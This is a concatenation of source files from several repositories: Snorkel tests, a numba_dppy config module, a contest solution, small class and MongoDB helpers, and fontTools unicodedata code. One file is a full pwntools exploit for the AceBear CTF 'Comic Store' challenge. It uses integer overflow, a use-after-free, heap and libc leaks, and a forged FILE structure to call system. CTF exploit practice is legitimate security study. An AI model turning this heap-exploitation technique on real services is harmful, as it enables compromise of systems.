] | 1 | 2020-06-06T05:04:12.000Z | 2020-06-06T05:04:12.000Z | test/map/test_core.py | dataframing/snorkel | be6cec76f6758ed6f8d0ca5da7342af28ad5486c | [
"Apache-2.0"
] | null | null | null | test/map/test_core.py | dataframing/snorkel | be6cec76f6758ed6f8d0ca5da7342af28ad5486c | [
"Apache-2.0"
] | 1 | 2021-04-25T21:19:21.000Z | 2021-04-25T21:19:21.000Z | import unittest
from types import SimpleNamespace
from typing import Any, Optional
import numpy as np
import pandas as pd
import spacy
from snorkel.map import Mapper, lambda_mapper
from snorkel.map.core import get_hashable
from snorkel.types import DataPoint, FieldMap
class SplitWordsMapper(Mapper):
def __init__(
self, name: str, text_field: str, lower_field: str, words_field: str
) -> None:
super().__init__(
name, dict(text=text_field), dict(lower=lower_field, words=words_field)
)
def run(self, text: str) -> FieldMap: # type: ignore
return dict(lower=text.lower(), words=text.split())
class SplitWordsMapperDefaultArgs(Mapper):
def run(self, text: str) -> FieldMap: # type: ignore
return dict(lower=text.lower(), words=text.split())
class MapperReturnsNone(Mapper):
def run(self, text: str) -> Optional[FieldMap]: # type: ignore
return None
class MapperWithArgs(Mapper):
def run(self, text: str, *args: Any) -> Optional[FieldMap]: # type: ignore
return None
class MapperWithKwargs(Mapper):
def run(self, text: str, **kwargs: Any) -> Optional[FieldMap]: # type: ignore
return None
class MapperWithPre(Mapper):
def run(self, num_squared: float) -> Optional[FieldMap]: # type: ignore
return dict(double_num_squared=2 * num_squared)
class MapperWithPre2(Mapper):
def run(self, double_num_squared: float) -> Optional[FieldMap]: # type: ignore
return dict(double_num_squared_plus_1=double_num_squared + 1)
class SquareHitTracker:
def __init__(self):
self.n_hits = 0
def __call__(self, x: float) -> float:
self.n_hits += 1
return x ** 2
@lambda_mapper()
def square(x: DataPoint) -> DataPoint:
x.num_squared = x.num ** 2
return x
@lambda_mapper()
def modify_in_place(x: DataPoint) -> DataPoint:
x.d["my_key"] = 0
x.d_new = x.d
return x
class TestMapperCore(unittest.TestCase):
def _get_x(self, num=8, text="Henry has fun") -> SimpleNamespace:
return SimpleNamespace(num=num, text=text)
def _get_x_dict(self) -> SimpleNamespace:
return SimpleNamespace(num=8, d=dict(my_key=1))
def test_numeric_mapper(self) -> None:
x_mapped = square(self._get_x())
# NB: not using `self.assertIsNotNone` due to mypy
# See https://github.com/python/mypy/issues/5088
assert x_mapped is not None
x_expected = SimpleNamespace(num=8, text="Henry has fun", num_squared=64)
self.assertEqual(x_mapped, x_expected)
def test_text_mapper(self) -> None:
split_words = SplitWordsMapper(
"split_words", "text", "text_lower", "text_words"
)
x_mapped = split_words(self._get_x())
assert x_mapped is not None
x_expected = SimpleNamespace(
num=8,
text="Henry has fun",
text_lower="henry has fun",
text_words=["Henry", "has", "fun"],
)
self.assertEqual(x_mapped, x_expected)
def test_mapper_same_field(self) -> None:
split_words = SplitWordsMapper("split_words", "text", "text", "text_words")
x = self._get_x()
x_mapped = split_words(x)
self.assertEqual(x, self._get_x())
assert x_mapped is not None
x_expected = SimpleNamespace(
num=8, text="henry has fun", text_words=["Henry", "has", "fun"]
)
self.assertEqual(x_mapped, x_expected)
def test_mapper_default_args(self) -> None:
split_words = SplitWordsMapperDefaultArgs("split_words")
x_mapped = split_words(self._get_x())
assert x_mapped is not None
x_expected = SimpleNamespace(
num=8,
text="Henry has fun",
lower="henry has fun",
words=["Henry", "has", "fun"],
)
self.assertEqual(x_mapped, x_expected)
def test_mapper_in_place(self) -> None:
x = self._get_x_dict()
x_mapped = modify_in_place(x)
self.assertEqual(x, self._get_x_dict())
assert x_mapped is not None
x_expected = SimpleNamespace(num=8, d=dict(my_key=0), d_new=dict(my_key=0))
self.assertEqual(x_mapped, x_expected)
def test_mapper_returns_none(self) -> None:
mapper = MapperReturnsNone("none_mapper")
x_mapped = mapper(self._get_x())
self.assertIsNone(x_mapped)
def test_mapper_pre(self) -> None:
mapper_no_pre = MapperWithPre("pre_mapper")
x = self._get_x(3)
with self.assertRaises(AttributeError):
x_mapped = mapper_no_pre(x)
mapper_pre = MapperWithPre("pre_mapper", pre=[square])
x = self._get_x(3)
x_mapped = mapper_pre(x)
self.assertEqual(x, self._get_x(3))
assert x_mapped is not None
x_expected = SimpleNamespace(
num=3, num_squared=9, double_num_squared=18, text="Henry has fun"
)
self.assertEqual(x_mapped, x_expected)
mapper_pre_2 = MapperWithPre2("pre_mapper", pre=[mapper_pre])
x = self._get_x(3)
x_mapped = mapper_pre_2(x)
self.assertEqual(x, self._get_x(3))
assert x_mapped is not None
x_expected = SimpleNamespace(
num=3,
num_squared=9,
double_num_squared=18,
double_num_squared_plus_1=19,
text="Henry has fun",
)
self.assertEqual(x_mapped, x_expected)
def test_mapper_pre_decorator(self) -> None:
@lambda_mapper()
def mapper_no_pre(x: DataPoint) -> DataPoint:
x.double_num_squared = 2 * x.num_squared
return x
x = self._get_x(3)
with self.assertRaises(AttributeError):
x_mapped = mapper_no_pre(x)
@lambda_mapper(pre=[square])
def mapper_pre(x: DataPoint) -> DataPoint:
x.double_num_squared = 2 * x.num_squared
return x
x = self._get_x(3)
x_mapped = mapper_pre(x)
self.assertEqual(x, self._get_x(3))
assert x_mapped is not None
x_expected = SimpleNamespace(
num=3, num_squared=9, double_num_squared=18, text="Henry has fun"
)
self.assertEqual(x_mapped, x_expected)
@lambda_mapper(pre=[mapper_pre])
def mapper_pre_2(x: DataPoint) -> DataPoint:
x.double_num_squared_plus_1 = x.double_num_squared + 1
return x
x = self._get_x(3)
x_mapped = mapper_pre_2(x)
self.assertEqual(x, self._get_x(3))
assert x_mapped is not None
x_expected = SimpleNamespace(
num=3,
num_squared=9,
double_num_squared=18,
double_num_squared_plus_1=19,
text="Henry has fun",
)
self.assertEqual(x_mapped, x_expected)
def test_decorator_mapper_memoized(self) -> None:
square_hit_tracker = SquareHitTracker()
@lambda_mapper(memoize=True)
def square(x: DataPoint) -> DataPoint:
x.num_squared = square_hit_tracker(x.num)
return x
x8 = self._get_x()
x9 = self._get_x(9)
x8_mapped = square(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.num_squared, 64)
self.assertEqual(square_hit_tracker.n_hits, 1)
x8_mapped = square(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.num_squared, 64)
self.assertEqual(square_hit_tracker.n_hits, 1)
x9_mapped = square(x9)
assert x9_mapped is not None
self.assertEqual(x9_mapped.num_squared, 81)
self.assertEqual(square_hit_tracker.n_hits, 2)
x8_mapped = square(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.num_squared, 64)
self.assertEqual(square_hit_tracker.n_hits, 2)
square.reset_cache()
x8_mapped = square(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.num_squared, 64)
self.assertEqual(square_hit_tracker.n_hits, 3)
def test_decorator_mapper_memoized_none(self) -> None:
square_hit_tracker = SquareHitTracker()
@lambda_mapper(memoize=True)
def square(x: DataPoint) -> DataPoint:
x.num_squared = square_hit_tracker(x.num)
if x.num == 21:
return None
return x
x21 = self._get_x(21)
x21_mapped = square(x21)
self.assertIsNone(x21_mapped)
self.assertEqual(square_hit_tracker.n_hits, 1)
x21_mapped = square(x21)
self.assertIsNone(x21_mapped)
self.assertEqual(square_hit_tracker.n_hits, 1)
def test_decorator_mapper_not_memoized(self) -> None:
square_hit_tracker = SquareHitTracker()
@lambda_mapper(memoize=False)
def square(x: DataPoint) -> DataPoint:
x.num_squared = square_hit_tracker(x.num)
return x
x8 = self._get_x()
x9 = self._get_x(9)
x8_mapped = square(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.num_squared, 64)
self.assertEqual(square_hit_tracker.n_hits, 1)
x8_mapped = square(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.num_squared, 64)
self.assertEqual(square_hit_tracker.n_hits, 2)
x19_mapped = square(x9)
assert x19_mapped is not None
self.assertEqual(x19_mapped.num_squared, 81)
self.assertEqual(square_hit_tracker.n_hits, 3)
x8_mapped = square(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.num_squared, 64)
self.assertEqual(square_hit_tracker.n_hits, 4)
def test_mapper_pre_memoized(self) -> None:
square_hit_tracker = SquareHitTracker()
@lambda_mapper(memoize=False)
def square(x: DataPoint) -> DataPoint:
x.num_squared = square_hit_tracker(x.num)
return x
@lambda_mapper(pre=[square], memoize=True)
def mapper_pre(x: DataPoint) -> DataPoint:
x.double_num_squared = 2 * x.num_squared
return x
x8 = self._get_x()
x9 = self._get_x(9)
x8_mapped = mapper_pre(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.double_num_squared, 128)
self.assertEqual(square_hit_tracker.n_hits, 1)
x8_mapped = mapper_pre(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.double_num_squared, 128)
self.assertEqual(square_hit_tracker.n_hits, 1)
x9_mapped = mapper_pre(x9)
assert x9_mapped is not None
self.assertEqual(x9_mapped.double_num_squared, 162)
self.assertEqual(square_hit_tracker.n_hits, 2)
x8_mapped = mapper_pre(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.double_num_squared, 128)
self.assertEqual(square_hit_tracker.n_hits, 2)
mapper_pre.reset_cache()
x8_mapped = mapper_pre(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.double_num_squared, 128)
self.assertEqual(square_hit_tracker.n_hits, 3)
def test_mapper_decorator_no_parens(self) -> None:
with self.assertRaisesRegex(ValueError, "missing parentheses"):
@lambda_mapper
def square(x: DataPoint) -> DataPoint:
x.num_squared = x.num ** 2
return x
def test_mapper_with_args_kwargs(self) -> None:
with self.assertRaises(ValueError):
MapperWithArgs("my_mapper")
with self.assertRaises(ValueError):
MapperWithKwargs("my_mapper")
class TestGetHashable(unittest.TestCase):
def test_get_hashable_hashable(self) -> None:
x = (8, "abc")
x_hashable = get_hashable(x)
self.assertEqual(x, x_hashable)
def test_get_hashable_dict(self) -> None:
d = dict(a=8, b=dict(c=9, d="foo"))
d_hashable = get_hashable(d)
d_sub_expected = frozenset((("c", 9), ("d", "foo")))
d_expected = frozenset((("a", 8), ("b", d_sub_expected)))
self.assertEqual(d_hashable, d_expected)
self.assertEqual(hash(d_hashable), hash(d_expected))
def test_get_hashable_list(self) -> None:
c = [8, dict(c=9, d="foo")]
c_hashable = get_hashable(c)
c_expected = (8, frozenset((("c", 9), ("d", "foo"))))
self.assertEqual(c_hashable, c_expected)
self.assertEqual(hash(c_hashable), hash(c_expected))
def test_get_hashable_series(self) -> None:
s = pd.Series(dict(a=8, b=dict(c=9, d="foo")), name="bar")
s_hashable = get_hashable(s)
s_sub_expected = frozenset((("c", 9), ("d", "foo")))
s_expected = frozenset((("a", 8), ("b", s_sub_expected)))
self.assertEqual(s_hashable, s_expected)
self.assertEqual(hash(s_hashable), hash(s_expected))
def test_get_hashable_series_with_doc(self) -> None:
nlp = spacy.load("en_core_web_sm")
doc = nlp("Foo went to the bar.")
s = pd.Series(dict(a=8, b=doc), name="baz")
s_hashable = get_hashable(s)
s_expected = frozenset((("a", 8), ("b", doc)))
self.assertEqual(s_hashable, s_expected)
self.assertEqual(hash(s_hashable), hash(s_expected))
def test_get_hashable_ndarray(self) -> None:
v = np.array([[3, 6, 9], [0.4, 0.8, 0.12]])
x = (8, dict(a=v))
x_hashable = get_hashable(x)
x_expected = (8, frozenset((("a", v.data.tobytes()),)))
self.assertEqual(x_hashable, x_expected)
def test_get_hashable_unhashable(self) -> None:
v = pd.DataFrame(dict(a=[4, 5], b=[1, 2]))
x = (8, dict(a=v))
with self.assertRaises(ValueError):
get_hashable(x)
| 34.70529 | 83 | 0.628683 |
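The memoization tests above depend on turning a data point into a hashable cache key (that is what get_hashable is for). A rough standalone sketch of that caching idea, not Snorkel's actual implementation:
def memoize_on_key(make_key):
    # cache results keyed by a hashable summary of the argument
    def decorator(fn):
        cache = {}
        def wrapper(x):
            key = make_key(x)
            if key not in cache:
                cache[key] = fn(x)
            return cache[key]
        return wrapper
    return decorator
@memoize_on_key(lambda d: frozenset(d.items()))  # plain dicts are unhashable, so freeze their items
def square_num(d):
    print("computing")  # printed only on a cache miss
    return d["num"] ** 2
square_num({"num": 8})  # prints "computing" and returns 64
square_num({"num": 8})  # answered from the cache, prints nothing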
794626c346290f14e92abde38acd065c4352bd89 | 1,822 | py | Python | numba_dppy/config.py | fossabot/numba-dppy | 918922d94c64572c279679b893445bf84f817187 | [
"Apache-2.0"
] | null | null | null | numba_dppy/config.py | fossabot/numba-dppy | 918922d94c64572c279679b893445bf84f817187 | [
"Apache-2.0"
] | 1 | 2021-05-08T09:23:15.000Z | 2021-05-08T09:23:15.000Z | numba_dppy/config.py | fossabot/numba-dppy | 918922d94c64572c279679b893445bf84f817187 | [
"Apache-2.0"
] | 1 | 2021-05-09T13:51:03.000Z | 2021-05-09T13:51:03.000Z | # Copyright 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
try:
import dpctl
dppy_present = False
try:
# For the extension to work we should have at least one
# non-host SYCL device.
dppy_present = not dpctl.select_default_device().is_host
except ValueError:
dppy_present = False
except:
dppy_present = False
def _readenv(name, ctor, default):
"""Original version from numba\core\config.py
class _EnvReloader():
...
def process_environ():
def _readenv(): ...
"""
value = os.environ.get(name)
if value is None:
return default() if callable(default) else default
try:
return ctor(value)
except Exception:
import warnings
warnings.warn(
"environ %s defined but failed to parse '%s'" % (name, value),
RuntimeWarning,
)
return default
# Save intermediate files being generated by DPPY
SAVE_IR_FILES = _readenv("NUMBA_DPPY_SAVE_IR_FILES", int, 0)
# Turn SPIRV-VALIDATION ON/OFF switch
SPIRV_VAL = _readenv("NUMBA_DPPY_SPIRV_VAL", int, 0)
# Dump offload diagnostics
OFFLOAD_DIAGNOSTICS = _readenv("NUMBA_DPPY_OFFLOAD_DIAGNOSTICS", int, 0)
FALLBACK_ON_CPU = _readenv("NUMBA_DPPY_FALLBACK_ON_CPU", int, 1)
| 28.46875 | 74 | 0.69045 |
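_readenv above is a small pattern for reading typed settings from the environment with a safe fallback. A self-contained usage sketch of the same shape (the environment variable names below are made up, not real flags):
import os
def read_env(name, ctor, default):
    # parse the variable with ctor; fall back when it is unset or unparseable
    value = os.environ.get(name)
    if value is None:
        return default() if callable(default) else default
    try:
        return ctor(value)
    except Exception:
        return default
os.environ["MY_FAKE_DEBUG_LEVEL"] = "3"
print(read_env("MY_FAKE_DEBUG_LEVEL", int, 0))   # 3
print(read_env("MY_FAKE_UNSET_OPTION", int, 1))  # 1 (fallback)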
7946284304115c48bcd1e8ccf24051890b5eb702 | 1,423 | py | Python | ICPC_Mirrors/Nitc_9.0/nwerc2019all/jackdawsandcrows/submissions/accepted/per_faster_sort.py | Shahraaz/CP_P_S5 | b068ad02d34338337e549d92a14e3b3d9e8df712 | [
"MIT"
] | null | null | null | ICPC_Mirrors/Nitc_9.0/nwerc2019all/jackdawsandcrows/submissions/accepted/per_faster_sort.py | Shahraaz/CP_P_S5 | b068ad02d34338337e549d92a14e3b3d9e8df712 | [
"MIT"
] | null | null | null | ICPC_Mirrors/Nitc_9.0/nwerc2019all/jackdawsandcrows/submissions/accepted/per_faster_sort.py | Shahraaz/CP_P_S5 | b068ad02d34338337e549d92a14e3b3d9e8df712 | [
"MIT"
] | null | null | null | def cost(v1, v2, sgn=1):
return v1 is not None and v2 is not None and sgn*v1*v2 >= 0
class Elem:
def __init__(self, v, p):
self.v = v
self.f = 1
self.prev = p
if p: p.next = self
self.next = None
def rm(self):
if self.prev: self.prev.next = self.next
if self.next: self.next.prev = self.prev
def midc(self):
return self.next is not None and self.prev is not None and cost(self.prev.v, self.next.v, 1-2*(self.f % 2))
def merge(self, node):
if node is None: return 0
if node.v is None:
self.f += node.f
node.rm()
return node.midc()
return cost(self.v, node.v)
def fuzzy(self):
delta = self.merge(self.prev) + self.merge(self.next) - self.midc()
self.v = None
return delta
def solve():
(n, x, y) = map(int, raw_input().split())
A = map(int, raw_input().split())
V = [Elem(A[0], None)]
p = A[0]
dels = A[0] == 0
for i in range(1, n):
dels += p*A[i] > 0 or not A[i]
if A[i]: p = A[i]
V.append(Elem(A[i], V[-1]))
ans = y*dels
dels = sum(A[i]*A[i+1] >= 0 for i in range(n-1))
events = [abs(A[i])*n+i for i in range(n)]
events.sort()
for e in events:
c = e/n
v = V[e%n]
dels -= v.fuzzy()
ans = min(ans, (c+1)*x + y*dels)
return ans
print solve()
| 27.365385 | 115 | 0.504568 |
7946288c7e8323a08d8ca1dc213a8e53d3aabbb0 | 3,981 | py | Python | 2018 AceBear CTF/Comic Store/comic.py | mathboy7/CTF | e279bf91ad6b22fc41087571c5fba9501832ab80 | [
"Apache-2.0"
] | 46 | 2017-11-07T05:30:26.000Z | 2021-11-24T09:33:41.000Z | 2018 AceBear CTF/Comic Store/comic.py | mathboy7/CTF | e279bf91ad6b22fc41087571c5fba9501832ab80 | [
"Apache-2.0"
] | null | null | null | 2018 AceBear CTF/Comic Store/comic.py | mathboy7/CTF | e279bf91ad6b22fc41087571c5fba9501832ab80 | [
"Apache-2.0"
] | 3 | 2017-11-14T14:45:28.000Z | 2020-08-30T07:59:04.000Z | from pwn import *
#env = {"LD_PRELOAD":"./comic.so.6"}
#r = process("./comic_store", env=env)
r = remote("comicstore.acebear.site", 3005)
def register(name):
r.sendline("1")
print r.recvuntil("name: ")
r.send(name)
print r.recvuntil("choice: ")
def addComic(name, quantity):
r.sendline("3")
print r.recvuntil("comic: ")
r.sendline(name)
print r.recvuntil("Quantity: ")
r.sendline(str(quantity))
print r.recvuntil("choice: ")
def rename(name):
r.sendline("4")
print r.recvuntil("choice: ")
r.sendline("2")
print r.recvuntil("name: ")
r.send(name)
print r.recvuntil("choice: ")
r.sendline("4")
print r.recvuntil("choice: ")
def feedback(sbig, feedback):
r.sendline("4")
print r.recvuntil("choice: ")
r.sendline("3")
print r.recvuntil("choice: ")
r.sendline(str(sbig))
print r.recvuntil(": ")
r.send(feedback)
r.sendline("4")
print r.recvuntil("choice: ")
def takeComicOut(comic, quantity):
r.sendline("5")
print r.recvuntil("choice: ")
r.sendline("2")
print r.recvuntil("comic: ")
r.sendline(comic)
print r.recvuntil("Quantity: ")
r.sendline(str(quantity))
print r.recvuntil("choice: ")
r.sendline("3")
print r.recvuntil("choice: ")
print r.recvuntil("choice: ")
#gdb.attach(r, "")
register("A"*0xa0)
for i in range(7):
addComic("Conan", 138548) # using integer overflow
takeComicOut("Conan", 138500)
r.sendline("6")
print r.recvuntil("no) ")
r.sendline("1") # I'm rich now!
print r.recvuntil("choice: ")
addComic("Conan", 1)
addComic("Dragon Ball", 1)
addComic("Doraemon", 1)
for i in range(6):
addComic("Doraemon", 165192)
addComic("Doraemon", 8847)
r.sendline("6")
print r.recvuntil("no) ")
r.sendline("1") # Trigger UAF
addComic("Naruto", 1)
r.sendline("5")
print r.recvuntil("choice: ")
r.sendline("1")
print r.recvuntil("30000 VND")
print r.recvuntil("* ")
rv = r.recv(6)
heap = u64(rv + "\x00\x00")
heap_base = heap - 0xd0
print r.recvuntil("choice: ")
r.sendline("3")
print r.recvuntil("choice: ")
print "heap: " + hex(heap_base)
rename("A"*0xe8 + p64(heap_base+0x310))
feedback(1, p64(heap_base+0x508)+"\x00"*16)
##### leak libc #####
r.sendline("5")
print r.recvuntil("choice: ")
r.sendline("1")
print r.recvuntil("30000 VND")
print r.recvuntil("* ")
rv = r.recv(6)
libc = u64(rv + "\x00\x00")
#libc_base = libc - 0x3c1bf8
libc_base = libc - 0x3c4c18
gets = libc_base + 0x6ed80
system = libc_base + 0x45390
print r.recvuntil("choice: ")
r.sendline("3")
print r.recvuntil("choice: ")
print "libc: " + hex(libc)
addComic("Death Note", 1)
addComic("Conan", 138547)
addComic("Conan", 30116)
r.sendline("6")
print r.recvuntil("no) ")
r.sendline("1") # Trigger UAF
########################################
vtbl = p64(gets)*17
vtbl += p64(heap_base+0x530)
#vtbl += p64(0x0)
#vtbl += p64(0x21)
#vtbl += p64(heap_base+0x520) # name
#vtbl += p64(0)*2 # price, quantity
#vtbl += p64(0) # align
#vtbl += p64(0x0)
#vtbl += p64(0x21)
feedback(2, vtbl) # fake vtable
feedback(1, p64(heap_base+0x70) + p64(libc_base+0x3c56f8-0x10) + p64(heap_base + 0x520)) # UAF
addComic("One Piece", 1)
addComic("Inuyasha", 1)
r.sendline("6")
file_stream = "\x87\x20\xad\xfb\x3b\x73\x68\x00"
file_stream += p64(libc_base + 0x3c56a3)*7
file_stream += p64(libc_base + 0x3c56a4)
file_stream += "\x00"*32
file_stream += p64(libc_base + 0x3c48e0)
file_stream += p64(0x1)
file_stream += p64(0xffffffffffffffff)
file_stream += p64(0x0)
file_stream += p64(libc_base + 0x3c6780)
file_stream += p64(0xffffffffffffffff)
file_stream += "\x00"*8
file_stream += p64(libc_base + 0x3c47a0)
file_stream += "\x00"*24
file_stream += p64(0xffffffff)
file_stream += "\x00"*16
file_stream += p64(libc_base + 0x3c5700)
file_stream += p64(libc_base + 0x3c5540)
file_stream += p64(libc_base + 0x3c5620)
file_stream += p64(libc_base + 0x3c48e0)
file_stream += p64(libc_base + 0x20b70)
file_stream += p64(system)*15
r.sendline(file_stream)
r.interactive()
# AceBear{pl3ase_read_comic_wh3n_u_h4ve_fr33_tim3} | 21.994475 | 94 | 0.666918 |
794628ea9c4ce8f60dfa5cff3b9ea628f016bb0a | 808 | py | Python | 02-Classes-and-Instances/exer-04-employee.py | Beshkov/OOP | 297edadb3e7801dfeee5752a20aae6aead8da610 | [
"MIT"
] | 1 | 2021-05-24T17:51:53.000Z | 2021-05-24T17:51:53.000Z | 02-Classes-and-Instances/exer-04-employee.py | Beshkov/Python_OOP | 297edadb3e7801dfeee5752a20aae6aead8da610 | [
"MIT"
] | null | null | null | 02-Classes-and-Instances/exer-04-employee.py | Beshkov/Python_OOP | 297edadb3e7801dfeee5752a20aae6aead8da610 | [
"MIT"
] | null | null | null | class Employee:
def __init__(self, id, first_name, last_name, salary):
self.id = id
self.first_name = first_name
self.last_name = last_name
self.salary = salary
def get_full_name(self):
return f"{self.first_name} {self.last_name}"
def get_annual_salary(self):
return self.salary * 12
def raise_salary(self, amount):
        # self note: the amount should be validated; you can't raise a salary by a negative amount, hence the check below:
if amount <= 0:
return f"You cant raise salary by negative amount: {amount}"
self.salary += amount
return self.salary
employee = Employee(744423129, "John", "Smith", 1000)
print(employee.get_full_name())
print(employee.raise_salary(500))
print(employee.get_annual_salary())
| 32.32 | 113 | 0.667079 |
79462ac6da8cdecfa144c76ac63ad5d9c2a0c092 | 1,198 | py | Python | data/spider/quantaxisSpider/quantaxisSpider/spiders/mongodbQuery.py | QUANTAXIS/quant | d3b76799b20cac7a876fbdeb6f97c48295dde06f | [
"MIT"
] | null | null | null | data/spider/quantaxisSpider/quantaxisSpider/spiders/mongodbQuery.py | QUANTAXIS/quant | d3b76799b20cac7a876fbdeb6f97c48295dde06f | [
"MIT"
] | null | null | null | data/spider/quantaxisSpider/quantaxisSpider/spiders/mongodbQuery.py | QUANTAXIS/quant | d3b76799b20cac7a876fbdeb6f97c48295dde06f | [
"MIT"
] | 1 | 2021-04-10T07:10:42.000Z | 2021-04-10T07:10:42.000Z | import pymongo
import json
class querylist(object):
client = pymongo.MongoClient(host="127.0.0.1", port=27017)
db = client['quantaxis_Spider']
def queryMongodbSame(self,collname,keyname,keycontent):
client = pymongo.MongoClient(host="127.0.0.1", port=27017)
db = client['quantaxis_Spider']
coll = db[collname]
count = coll.find({keyname:keycontent}).count()
return count
def checkDifferentDatabase(self,col1,col2,keyname1,keyname2,x):
client = pymongo.MongoClient(host="127.0.0.1", port=27017)
db = client['quantaxis_Spider']
coll1 = db[col1]
coll2 = db[col2]
countnum=0
for url in coll1.find():
urlx=url[keyname1]
print (col2)
print (keyname1)
print (urlx)
count = self.queryMongodbSame(col2,keyname2,urlx)
print (count)
if count == x:
print ('none in the db2')
print (countnum)
else:
print ('already in')
continue
countnum+=1
print (countnum)
print (countnum)
| 28.52381 | 67 | 0.542571 |
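checkDifferentDatabase above counts matches by hand to find documents of one collection that are missing from another. A compact sketch of the same check using count_documents (the modern replacement for the deprecated cursor.count()); the connection details are placeholders:
import pymongo
client = pymongo.MongoClient(host="127.0.0.1", port=27017)
db = client["quantaxis_Spider"]
def missing_in_second(col1, col2, key1, key2):
    # yield key values present in col1 but absent from col2
    for doc in db[col1].find({}, {key1: 1}):
        value = doc[key1]
        if db[col2].count_documents({key2: value}) == 0:
            yield value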
79462c76db735efcac8fc61d333893d5300569da | 7,964 | py | Python | Lib/fontTools/unicodedata/__init__.py | twardoch/fonttools-py27 | 75b852d3f59fc0d03c6e78581530597d4c6368a1 | [
"MIT",
"BSD-3-Clause"
] | 240 | 2021-01-11T14:49:24.000Z | 2022-03-29T22:33:49.000Z | Lib/fontTools/unicodedata/__init__.py | twardoch/fonttools-py27 | 75b852d3f59fc0d03c6e78581530597d4c6368a1 | [
"MIT",
"BSD-3-Clause"
] | 77 | 2021-01-12T20:23:30.000Z | 2022-03-28T12:14:34.000Z | Lib/fontTools/unicodedata/__init__.py | twardoch/fonttools-py27 | 75b852d3f59fc0d03c6e78581530597d4c6368a1 | [
"MIT",
"BSD-3-Clause"
] | 28 | 2021-01-17T05:44:11.000Z | 2022-01-11T19:58:46.000Z | from __future__ import (
print_function, division, absolute_import, unicode_literals)
from fontTools.misc.py23 import *
import re
from bisect import bisect_right
try:
# use unicodedata backport compatible with python2:
# https://github.com/mikekap/unicodedata2
from unicodedata2 import *
except ImportError: # pragma: no cover
# fall back to built-in unicodedata (possibly outdated)
from unicodedata import *
from . import Blocks, Scripts, ScriptExtensions, OTTags
__all__ = [tostr(s) for s in (
# names from built-in unicodedata module
"lookup",
"name",
"decimal",
"digit",
"numeric",
"category",
"bidirectional",
"combining",
"east_asian_width",
"mirrored",
"decomposition",
"normalize",
"unidata_version",
"ucd_3_2_0",
# additonal functions
"block",
"script",
"script_extension",
"script_name",
"script_code",
"script_horizontal_direction",
"ot_tags_from_script",
"ot_tag_to_script",
)]
def script(char):
""" Return the four-letter script code assigned to the Unicode character
'char' as string.
>>> script("a")
'Latn'
>>> script(",")
'Zyyy'
>>> script(unichr(0x10FFFF))
'Zzzz'
"""
code = byteord(char)
# 'bisect_right(a, x, lo=0, hi=len(a))' returns an insertion point which
# comes after (to the right of) any existing entries of x in a, and it
# partitions array a into two halves so that, for the left side
# all(val <= x for val in a[lo:i]), and for the right side
# all(val > x for val in a[i:hi]).
# Our 'SCRIPT_RANGES' is a sorted list of ranges (only their starting
# breakpoints); we want to use `bisect_right` to look up the range that
# contains the given codepoint: i.e. whose start is less than or equal
# to the codepoint. Thus, we subtract -1 from the index returned.
i = bisect_right(Scripts.RANGES, code)
return Scripts.VALUES[i-1]
def script_extension(char):
""" Return the script extension property assigned to the Unicode character
'char' as a set of string.
>>> script_extension("a") == {'Latn'}
True
>>> script_extension(unichr(0x060C)) == {'Arab', 'Rohg', 'Syrc', 'Thaa'}
True
>>> script_extension(unichr(0x10FFFF)) == {'Zzzz'}
True
"""
code = byteord(char)
i = bisect_right(ScriptExtensions.RANGES, code)
value = ScriptExtensions.VALUES[i-1]
if value is None:
# code points not explicitly listed for Script Extensions
# have as their value the corresponding Script property value
return {script(char)}
return value
def script_name(code, default=KeyError):
""" Return the long, human-readable script name given a four-letter
Unicode script code.
If no matching name is found, a KeyError is raised by default.
You can use the 'default' argument to return a fallback value (e.g.
'Unknown' or None) instead of throwing an error.
"""
try:
return str(Scripts.NAMES[code].replace("_", " "))
except KeyError:
if isinstance(default, type) and issubclass(default, KeyError):
raise
return default
_normalize_re = re.compile(r"[-_ ]+")
def _normalize_property_name(string):
"""Remove case, strip space, '-' and '_' for loose matching."""
return _normalize_re.sub("", string).lower()
_SCRIPT_CODES = {_normalize_property_name(v): k
for k, v in Scripts.NAMES.items()}
def script_code(script_name, default=KeyError):
"""Returns the four-letter Unicode script code from its long name
If no matching script code is found, a KeyError is raised by default.
You can use the 'default' argument to return a fallback string (e.g.
'Zzzz' or None) instead of throwing an error.
"""
normalized_name = _normalize_property_name(script_name)
try:
return _SCRIPT_CODES[normalized_name]
except KeyError:
if isinstance(default, type) and issubclass(default, KeyError):
raise
return default
# The data on script direction is taken from harfbuzz's "hb-common.cc":
# https://goo.gl/X5FDXC
# It matches the CLDR "scriptMetadata.txt as of January 2018:
# http://unicode.org/repos/cldr/trunk/common/properties/scriptMetadata.txt
RTL_SCRIPTS = {
# Unicode-1.1 additions
'Arab', # Arabic
'Hebr', # Hebrew
# Unicode-3.0 additions
'Syrc', # Syriac
'Thaa', # Thaana
# Unicode-4.0 additions
'Cprt', # Cypriot
# Unicode-4.1 additions
'Khar', # Kharoshthi
# Unicode-5.0 additions
'Phnx', # Phoenician
'Nkoo', # Nko
# Unicode-5.1 additions
'Lydi', # Lydian
# Unicode-5.2 additions
'Avst', # Avestan
'Armi', # Imperial Aramaic
'Phli', # Inscriptional Pahlavi
'Prti', # Inscriptional Parthian
'Sarb', # Old South Arabian
'Orkh', # Old Turkic
'Samr', # Samaritan
# Unicode-6.0 additions
'Mand', # Mandaic
# Unicode-6.1 additions
'Merc', # Meroitic Cursive
'Mero', # Meroitic Hieroglyphs
# Unicode-7.0 additions
'Mani', # Manichaean
'Mend', # Mende Kikakui
'Nbat', # Nabataean
'Narb', # Old North Arabian
'Palm', # Palmyrene
'Phlp', # Psalter Pahlavi
# Unicode-8.0 additions
